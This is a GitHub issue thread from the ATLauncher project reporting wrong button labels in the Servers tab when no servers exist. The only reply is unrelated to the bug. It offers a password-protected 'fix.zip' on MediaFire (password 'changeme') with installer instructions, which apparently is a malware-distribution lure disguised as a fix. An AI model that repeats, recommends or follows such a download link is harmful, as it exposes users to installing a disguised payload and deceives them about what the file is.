### ISSUE TITLE
When no servers installed, the buttons in the Servers tab shows the wrong text on the buttons

### ISSUE THREAD

**Issue by RyanTheAllmighty** [ATLauncher/ATLauncher#950]
### What happened?

1. Have no servers created
2. Go to the Servers tab
3. Expect the buttons to say Create Server and Download Server

![image](https://github.com/user-attachments/assets/4d12363a-277a-4596-a84c-248be4a70d70)

### Operating System

Windows

### Is this actually a launcher bug?

- [X] I am sure this is a bug with the launcher and not an issue with running Minecraft

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
